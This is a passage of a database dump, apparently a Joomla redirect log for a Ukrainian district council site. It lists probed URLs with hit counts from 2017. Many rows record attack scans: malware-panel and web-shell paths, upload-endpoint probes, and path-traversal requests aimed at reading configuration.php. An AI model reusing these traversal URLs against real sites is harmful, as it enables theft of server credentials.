00:00:00',301),(31098,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/style_light.css',NULL,'','',1,0,'2017-08-20 14:32:58','0000-00-00 00:00:00',301),(31099,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/gate.php',NULL,'','',2,0,'2017-08-20 14:32:59','0000-00-00 00:00:00',301),(31100,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes',NULL,'','',1,0,'2017-08-20 14:33:01','0000-00-00 00:00:00',301),(31101,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/',NULL,'','',1,0,'2017-08-20 14:33:01','0000-00-00 00:00:00',301),(31102,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/statistics.php/',NULL,'','',1,0,'2017-08-20 14:33:06','0000-00-00 00:00:00',301),(31103,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/database.php',NULL,'','',1,0,'2017-08-20 14:33:07','0000-00-00 00:00:00',301),(31104,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/database.php/',NULL,'','',1,0,'2017-08-20 14:33:08','0000-00-00 00:00:00',301),(31105,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/gate.php/',NULL,'','',1,0,'2017-08-20 14:33:28','0000-00-00 00:00:00',301),(31106,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/commands.php',NULL,'','',1,0,'2017-08-20 14:33:29','0000-00-00 00:00:00',301),(31107,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/commands.php/',NULL,'','',1,0,'2017-08-20 14:33:30','0000-00-00 00:00:00',301),(31108,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css/table_view.css',NULL,'','',1,0,'2017-08-20 14:33:36','0000-00-00 00:00:00',301),(31109,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/21421asdfdsf.php',NULL,'','',1,0,'2017-08-20 14:33:42','0000-00-00 00:00:00',301),(31110,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/webcams.php',NULL,'','',1,0,'2017-08-20 14:33:44','0000-00-00 00:00:00',301),(31111,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/deleteall.php',NULL,'','',1,0,'2017-08-20 14:33:45','0000-00-00 00:00:00',301),(31112,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/delete.php',NULL,'','',1,0,'2017-08-20 14:33:46','0000-00-00 00:00:00',301),(31113,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/passwords.php',NULL,'','',1,0,'2017-08-20 14:33:47','0000-00-00 00:00:00',301),(31114,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/keystrokes.php',NULL,'','',1,0,'2017-08-20 14:33:49','0000-00-00 00:00:00',301),(31115,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/post.php',NULL,'','',1,0,'2017-08-20 14:33:53','0000-00-00 00:00:00',301),(31116,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/create.php',NULL,'','',1,0,'2017-08-20 14:33:55','0000-00-00 00:00:00',301),(31117,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/language.php',NULL,'','',1,0,'2017-08-20 14:33:56','0000-00-00 00:00:00',301),(31118,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/images/',NULL,'','',2,0,'2017-08-20 14:33:58','0000-00-00 00:00:00',301),(31119,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/css/',NULL,'','',2,0,'2017-08-20 14:34:05','0000-00-00 00:00:00',301),(31120,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/flags/',NULL,'','',2,0,'2017-08-20 14:34:07','0000-00-00 00:00:00',301),(31121,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/images/',NULL,'','',2,0,'2017-08-20 14:34:11','0000-00-00 00:00:00',301),(31122,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/images/black/button/btn-arrow.gif',NULL,'','',1,0,'2017-08-20 14:34:14','0000-00-00 00:00:00',301),(31123,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/images/black/menu/menu.gif',NULL,'','',1,0,'2017-08-20 14:34:15','0000-00-00 00:00:00',301),(31124,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/images/default/button/btn-arrow.gif',NULL,'','',1,0,'2017-08-20 14:34:16','0000-00-00 00:00:00',301),(31125,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/resources/images/default/menu/menu.gif',NULL,'','',1,0,'2017-08-20 14:34:18','0000-00-00 00:00:00',301),(31126,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/images/save.png',NULL,'','',1,0,'2017-08-20 14:34:19','0000-00-00 00:00:00',301),(31127,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin/images/add.png',NULL,'','',1,0,'2017-08-20 14:34:21','0000-00-00 00:00:00',301),(31128,'http://www.malyn-rayrada.gov.ua/libraries/joomla/base/content-post.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/base/content-post.php','',1,0,'2017-08-24 17:08:02','0000-00-00 00:00:00',301),(31129,'http://malyn-rayrada.gov.ua/libraries/joomla/base/content-post.php',NULL,'http://malyn-rayrada.gov.ua/libraries/joomla/base/content-post.php','',2,0,'2017-08-25 00:03:19','0000-00-00 00:00:00',301),(31130,'http://www.malyn-rayrada.gov.ua/libraries/joomla/cache/controller/cache/cache/langs.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/cache/controller/cache/cache/langs.php','',1,0,'2017-08-25 14:03:00','0000-00-00 00:00:00',301),(31131,'http://malyn-rayrada.gov.ua/libraries/joomla/cache/controller/cache/cache/langs.php',NULL,'http://malyn-rayrada.gov.ua/libraries/joomla/cache/controller/cache/cache/langs.php','',1,0,'2017-08-25 20:17:05','0000-00-00 00:00:00',301),(31132,'http://malyn-rayrada.gov.ua/dd34dc04-ab86-40d4-854b-92c26fc530cc',NULL,'','',1,0,'2017-08-28 13:09:27','0000-00-00 00:00:00',301),(31133,'http://www.malyn-rayrada.gov.ua/modules/mod_swmenufree/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_swmenufree/logo_img.php','',1,0,'2017-08-28 16:17:33','0000-00-00 00:00:00',301),(31134,'http://www.malyn-rayrada.gov.ua/modules/mod_defender/tmpl/template.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_defender/tmpl/template.php','',1,0,'2017-08-29 07:33:48','0000-00-00 00:00:00',301),(31135,'http://malyn-rayrada.gov.ua/modules/mod_defender/tmpl/template.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_defender/tmpl/template.php','',1,0,'2017-08-29 10:15:10','0000-00-00 00:00:00',301),(31136,'http://malyn-rayrada.gov.ua/0c6f0161-aa4c-4fbc-a821-d77c173de1e9',NULL,'','',1,0,'2017-08-29 14:24:27','0000-00-00 00:00:00',301),(31137,'http://www.malyn-rayrada.gov.ua/modules/modules.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/modules.php','',2,0,'2017-08-29 16:58:48','0000-00-00 00:00:00',301),(31138,'http://malyn-rayrada.gov.ua/modules/modules.php',NULL,'http://malyn-rayrada.gov.ua/modules/modules.php','',3,0,'2017-08-29 23:16:40','0000-00-00 00:00:00',301),(31139,'http://www.malyn-rayrada.gov.ua/components/com_weblinks/models/setup.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_weblinks/models/setup.php','',1,0,'2017-08-30 09:08:29','0000-00-00 00:00:00',301),(31140,'http://malyn-rayrada.gov.ua/components/com_weblinks/models/setup.php',NULL,'http://malyn-rayrada.gov.ua/components/com_weblinks/models/setup.php','',1,0,'2017-08-30 12:49:48','0000-00-00 00:00:00',301),(31141,'http://www.malyn-rayrada.gov.ua/images/stories/readme.php',NULL,'http://www.malyn-rayrada.gov.ua/images/stories/readme.php','',1,0,'2017-08-30 19:26:31','0000-00-00 00:00:00',301),(31142,'http://malyn-rayrada.gov.ua/images/stories/readme.php',NULL,'http://malyn-rayrada.gov.ua/images/stories/readme.php','',1,0,'2017-08-31 02:25:33','0000-00-00 00:00:00',301),(31143,'http://malyn-rayrada.gov.ua/3d186e7e-7a31-460e-bae8-52158ee77b8d',NULL,'','',1,0,'2017-08-31 09:39:01','0000-00-00 00:00:00',301),(31144,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-26-10-2016-roku|time=7|spammed!|traffic=185335|comments=0',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-26-10-2016-roku%7CTIME=7%7CSPAMMED%21%7CTRAFFIC=185335%7CCOMMENTS=0','',1,0,'2017-09-01 02:41:41','0000-00-00 00:00:00',301),(31145,'http://www.malyn-rayrada.gov.ua/includes/u2p.php',NULL,'http://www.malyn-rayrada.gov.ua/includes/u2p.php','',2,0,'2017-09-07 17:20:02','0000-00-00 00:00:00',301),(31146,'http://malyn-rayrada.gov.ua/plugins/editors/froala/assets/css/index.php',NULL,'http://malyn-rayrada.gov.ua/index.php','',6,0,'2017-09-07 18:24:53','0000-00-00 00:00:00',301),(31147,'http://malyn-rayrada.gov.ua/editors/froala/assets/css/index.php',NULL,'http://malyn-rayrada.gov.ua/editors/froala/assets/css/index.php','',6,0,'2017-09-07 18:24:53','0000-00-00 00:00:00',301),(31148,'http://malyn-rayrada.gov.ua/modules/mod_random_image/tmpl/styles.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_random_image/tmpl/styles.php','',1,0,'2017-09-07 19:13:26','0000-00-00 00:00:00',301),(31149,'http://malyn-rayrada.gov.ua/0d3972d7-fc53-4d4e-8fb7-b8f4932cc2e1',NULL,'','',1,0,'2017-09-07 19:13:53','0000-00-00 00:00:00',301),(31150,'http://malyn-rayrada.gov.ua/includes/u2p.php',NULL,'http://malyn-rayrada.gov.ua/includes/u2p.php','',1,0,'2017-09-07 23:27:30','0000-00-00 00:00:00',301),(31151,'http://www.malyn-rayrada.gov.ua/modules/mod_random_image/tmpl/styles.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_random_image/tmpl/styles.php','',1,0,'2017-09-08 00:43:34','0000-00-00 00:00:00',301),(31152,'http://www.malyn-rayrada.gov.ua/libraries/respectmuslims.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/respectMuslims.php','',1,0,'2017-09-08 16:16:43','0000-00-00 00:00:00',301),(31153,'http://malyn-rayrada.gov.ua/libraries/respectmuslims.php',NULL,'http://malyn-rayrada.gov.ua/libraries/respectMuslims.php','',1,0,'2017-09-08 22:22:05','0000-00-00 00:00:00',301),(31154,'http://malyn-rayrada.gov.ua/attachments/article/1784/ð¿ñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ.pdf',NULL,'','',1,0,'2017-09-11 04:29:19','0000-00-00 00:00:00',301),(31155,'http://malyn-rayrada.gov.ua/attachments/article/1788/ñ€ðµð¹ñ‚ð¸ð½ð³ ð¿ðµñ€ñˆðµ ð¿ñ–ð²ñ€ñ–ñ‡ñ‡ñ 2017.pdf',NULL,'','',2,0,'2017-09-14 02:08:07','0000-00-00 00:00:00',301),(31156,'http://malyn-rayrada.gov.ua/4296fc68-db4c-4eca-b2d7-78c994f6ed54',NULL,'','',1,0,'2017-09-15 18:45:32','0000-00-00 00:00:00',301),(31157,'http://www.malyn-rayrada.gov.ua/jm-ajax/upload_file/',NULL,'http://www.malyn-rayrada.gov.ua/jm-ajax/upload_file/','',3,0,'2017-09-20 20:50:28','0000-00-00 00:00:00',301),(31158,'http://malyn-rayrada.gov.ua/attachments/article/1633/підсумки+голосування+14-7.pdf',NULL,'','',1,0,'2017-09-21 18:13:11','0000-00-00 00:00:00',301),(31159,'http://malyn-rayrada.gov.ua/03429658-4da1-4945-badd-88b43a6e9b95',NULL,'','',1,0,'2017-09-22 19:25:53','0000-00-00 00:00:00',301),(31160,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-09-25 19:13:47','0000-00-00 00:00:00',301),(31161,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1789-pro-peredachu-primishchennya-buvshoji-vishivskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-vishivskoji-silskoji-radi',NULL,'','',50,0,'2017-09-25 19:52:36','0000-00-00 00:00:00',301),(31162,'http://malyn-rayrada.gov.ua/attachments/article/1795/ð¿ñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ.pdf',NULL,'','',1,0,'2017-09-26 04:27:09','0000-00-00 00:00:00',301),(31163,'http://malyn-rayrada.gov.ua/wwwroot/addons/tinymce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:50:59','0000-00-00 00:00:00',301),(31164,'http://malyn-rayrada.gov.ua/public/js/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:50:59','0000-00-00 00:00:00',301),(31165,'http://malyn-rayrada.gov.ua/js/tinymce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:00','0000-00-00 00:00:00',301),(31166,'http://malyn-rayrada.gov.ua/tinybrowser/tree/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:00','0000-00-00 00:00:00',301),(31167,'http://malyn-rayrada.gov.ua/flikq/rocketeercms/blob/master/themes/admin/assets/js/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:00','0000-00-00 00:00:00',301),(31168,'http://malyn-rayrada.gov.ua/scripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:00','0000-00-00 00:00:00',301),(31169,'http://malyn-rayrada.gov.ua/painel/scripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:01','0000-00-00 00:00:00',301),(31170,'http://malyn-rayrada.gov.ua/tinymce_pt/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:01','0000-00-00 00:00:00',301),(31171,'http://malyn-rayrada.gov.ua/php/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:01','0000-00-00 00:00:00',301),(31172,'http://malyn-rayrada.gov.ua/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:01','0000-00-00 00:00:00',301),(31173,'http://malyn-rayrada.gov.ua/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',2,0,'2017-09-27 06:51:01','0000-00-00 00:00:00',301),(31174,'http://malyn-rayrada.gov.ua/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:02','0000-00-00 00:00:00',301),(31175,'http://malyn-rayrada.gov.ua/association/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:02','0000-00-00 00:00:00',301),(31176,'http://malyn-rayrada.gov.ua/js/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:02','0000-00-00 00:00:00',301),(31177,'http://malyn-rayrada.gov.ua/bd/search?q=health/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:02','0000-00-00 00:00:00',301),(31178,'http://malyn-rayrada.gov.ua/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:03','0000-00-00 00:00:00',301),(31179,'http://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:03','0000-00-00 00:00:00',301),(31180,'http://malyn-rayrada.gov.ua/public/javascripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:03','0000-00-00 00:00:00',301),(31181,'http://malyn-rayrada.gov.ua/cat-bin/tools/login/lib/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:03','0000-00-00 00:00:00',301),(31182,'http://malyn-rayrada.gov.ua/admin/lib/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',2,0,'2017-09-27 06:51:04','0000-00-00 00:00:00',301),(31183,'http://malyn-rayrada.gov.ua/static/js/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',2,0,'2017-09-27 06:51:04','0000-00-00 00:00:00',301),(31184,'http://malyn-rayrada.gov.ua/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',2,0,'2017-09-27 06:51:04','0000-00-00 00:00:00',301),(31185,'http://malyn-rayrada.gov.ua/projects/bilardii/resources/js/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2017-09-27 06:51:04','0000-00-00 00:00:00',301),(31186,'http://www.malyn-rayrada.gov.ua/wp-content/themes/organizer/lib_upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/organizer/lib_upload/server/php/','',1,0,'2017-09-27 13:24:04','0000-00-00 00:00:00',301),(31187,'http://www.malyn-rayrada.gov.ua//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2017-09-29 03:00:03','0000-00-00 00:00:00',301),(31188,'http://www.malyn-rayrada.gov.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2017-09-29 03:00:06','0000-00-00 00:00:00',301),(31189,'http://www.malyn-rayrada.gov.ua/plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php',NULL,'','',1,0,'2017-09-29 03:00:06','0000-00-00 00:00:00',301),(31190,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/theme/style.css',NULL,'','',2,0,'2017-09-29 05:17:04','0000-00-00 00:00:00',301),(31191,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/config.php',NULL,'','',6,0,'2017-09-29 05:17:17','0000-00-00 00:00:00',301),(31192,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/style_dark.css',NULL,'','',2,0,'2017-09-29 05:17:22','0000-00-00 00:00:00',301),(31193,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin.php',NULL,'','',6,0,'2017-09-29 05:17:26','0000-00-00 00:00:00',301),(31194,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/config.php',NULL,'','',1,0,'2017-09-29 05:17:30','0000-00-00 00:00:00',301),(31195,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css/',NULL,'','',4,0,'2017-09-29 05:17:35','0000-00-00 00:00:00',301),(31196,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css/content.css',NULL,'','',1,0,'2017-09-29 05:17:40','0000-00-00 00:00:00',301),(31197,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css/reset.css',NULL,'','',1,0,'2017-09-29 05:17:46','0000-00-00 00:00:00',301),(31198,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/',NULL,'','',1,0,'2017-09-29 05:17:48','0000-00-00 00:00:00',301),(31199,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/gear.png',NULL,'','',1,0,'2017-09-29 05:17:55','0000-00-00 00:00:00',301),(31200,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/header.png',NULL,'','',1,0,'2017-09-29 05:17:59','0000-00-00 00:00:00',301),(31201,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/user_female.png',NULL,'','',1,0,'2017-09-29 05:18:05','0000-00-00 00:00:00',301),(31202,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/arrow_left_ovr.png',NULL,'','',1,0,'2017-09-29 05:18:13','0000-00-00 00:00:00',301),(31203,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/bck_attention.png',NULL,'','',1,0,'2017-09-29 05:18:17','0000-00-00 00:00:00',301),(31204,'http://malyn-rayrada.gov.ua/login.php',NULL,'','',3,0,'2017-09-29 05:18:42','0000-00-00 00:00:00',301),(31205,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/login.php',NULL,'','',14,0,'2017-09-29 05:18:51','0000-00-00 00:00:00',301),(31206,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/home.php',NULL,'','',1,0,'2017-09-29 05:19:10','0000-00-00 00:00:00',301),(31207,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/index.html',NULL,'','',2,0,'2017-09-29 05:19:22','0000-00-00 00:00:00',301),(31208,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/graphics/banner.png',NULL,'','',1,0,'2017-09-29 05:19:32','0000-00-00 00:00:00',301),(31209,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/login.js',NULL,'','',1,0,'2017-09-29 05:19:35','0000-00-00 00:00:00',301),(31210,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/project.php',NULL,'','',1,0,'2017-09-29 05:20:02','0000-00-00 00:00:00',301),(31211,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lend.php',NULL,'','',2,0,'2017-09-29 05:20:16','0000-00-00 00:00:00',301),(31212,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lending/index.php',NULL,'','',5,0,'2017-09-29 05:20:35','0000-00-00 00:00:00',301),(31213,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/asdfdsfasfdasfsd.php',NULL,'','',1,0,'2017-09-29 05:20:51','0000-00-00 00:00:00',301),(31214,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/anal.php',NULL,'','',1,0,'2017-09-29 05:20:59','0000-00-00 00:00:00',301),(31215,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/biling.php',NULL,'','',1,0,'2017-09-29 05:21:06','0000-00-00 00:00:00',301),(31216,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/logout.php',NULL,'','',3,0,'2017-09-29 05:21:15','0000-00-00 00:00:00',301),(31217,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/change.php',NULL,'','',1,0,'2017-09-29 05:21:21','0000-00-00 00:00:00',301),(31218,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/statss.php',NULL,'','',1,0,'2017-09-29 05:21:35','0000-00-00 00:00:00',301),(31219,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/btn_submit.png',NULL,'','',3,0,'2017-09-29 05:21:53','0000-00-00 00:00:00',301),(31220,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/support.php',NULL,'','',2,0,'2017-09-29 05:22:25','0000-00-00 00:00:00',301),(31221,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lending/img/arab.png',NULL,'','',3,0,'2017-09-29 05:22:39','0000-00-00 00:00:00',301),(31222,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/icn_edit.png',NULL,'','',3,0,'2017-09-29 05:22:58','0000-00-00 00:00:00',301),(31223,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/js/hideshow.js',NULL,'','',2,0,'2017-09-29 05:23:21','0000-00-00 00:00:00',301),(31224,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lending/img/fbi.png',NULL,'','',1,0,'2017-09-29 05:24:05','0000-00-00 00:00:00',301),(31225,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/icn_search.png',NULL,'','',1,0,'2017-09-29 05:24:14','0000-00-00 00:00:00',301),(31226,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/breadcrumb_divider.png',NULL,'','',1,0,'2017-09-29 05:24:22','0000-00-00 00:00:00',301),(31227,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/resources/images/b.png',NULL,'','',1,0,'2017-09-29 05:24:33','0000-00-00 00:00:00',301),(31228,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/cron.php',NULL,'','',1,0,'2017-09-29 05:25:36','0000-00-00 00:00:00',301),(31229,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/tasks.php',NULL,'','',4,0,'2017-09-29 05:25:55','0000-00-00 00:00:00',301),(31230,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/stats.php',NULL,'','',1,0,'2017-09-29 05:26:09','0000-00-00 00:00:00',301),(31231,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/run.php',NULL,'','',1,0,'2017-09-29 05:26:15','0000-00-00 00:00:00',301),(31232,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/asdfddsas.php',NULL,'','',1,0,'2017-09-29 05:26:24','0000-00-00 00:00:00',301),(31233,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/view/img/favicon.png',NULL,'','',1,0,'2017-09-29 05:26:35','0000-00-00 00:00:00',301),(31234,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/tmp',NULL,'','',1,0,'2017-09-29 05:26:44','0000-00-00 00:00:00',301),(31235,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/tmp/',NULL,'','',1,0,'2017-09-29 05:26:52','0000-00-00 00:00:00',301),(31236,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/vendor',NULL,'','',1,0,'2017-09-29 05:26:58','0000-00-00 00:00:00',301),(31237,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/vendor/',NULL,'','',1,0,'2017-09-29 05:27:11','0000-00-00 00:00:00',301),(31238,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lib',NULL,'','',1,0,'2017-09-29 05:27:26','0000-00-00 00:00:00',301),(31239,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/lib/',NULL,'','',1,0,'2017-09-29 05:27:30','0000-00-00 00:00:00',301),(31240,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/app',NULL,'','',1,0,'2017-09-29 05:27:41','0000-00-00 00:00:00',301),(31241,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/app/',NULL,'','',1,0,'2017-09-29 05:27:45','0000-00-00 00:00:00',301),(31242,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/tmp/logs',NULL,'','',1,0,'2017-09-29 05:27:52','0000-00-00 00:00:00',301),(31243,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/tmp/logs/',NULL,'','',1,0,'2017-09-29 05:28:03','0000-00-00 00:00:00',301),(31244,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/uploads',NULL,'','',1,0,'2017-09-29 05:28:09','0000-00-00 00:00:00',301),(31245,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/uploads/',NULL,'','',1,0,'2017-09-29 05:28:11','0000-00-00 00:00:00',301),(31246,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/public',NULL,'','',1,0,'2017-09-29 05:28:23','0000-00-00 00:00:00',301),(31247,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/public/',NULL,'','',1,0,'2017-09-29 05:28:31','0000-00-00 00:00:00',301),(31248,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/public/css/app.css',NULL,'','',1,0,'2017-09-29 05:28:40','0000-00-00 00:00:00',301),(31249,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/api.php',NULL,'','',1,0,'2017-09-29 05:32:05','0000-00-00 00:00:00',301),(31250,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/data/login.css',NULL,'','',1,0,'2017-09-29 05:32:14','0000-00-00 00:00:00',301),(31251,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/asfdfa.php',NULL,'','',1,0,'2017-09-29 05:32:53','0000-00-00 00:00:00',301),(31252,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/login.php',NULL,'','',1,0,'2017-09-29 05:33:01','0000-00-00 00:00:00',301),(31253,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/chart.php',NULL,'','',1,0,'2017-09-29 05:33:04','0000-00-00 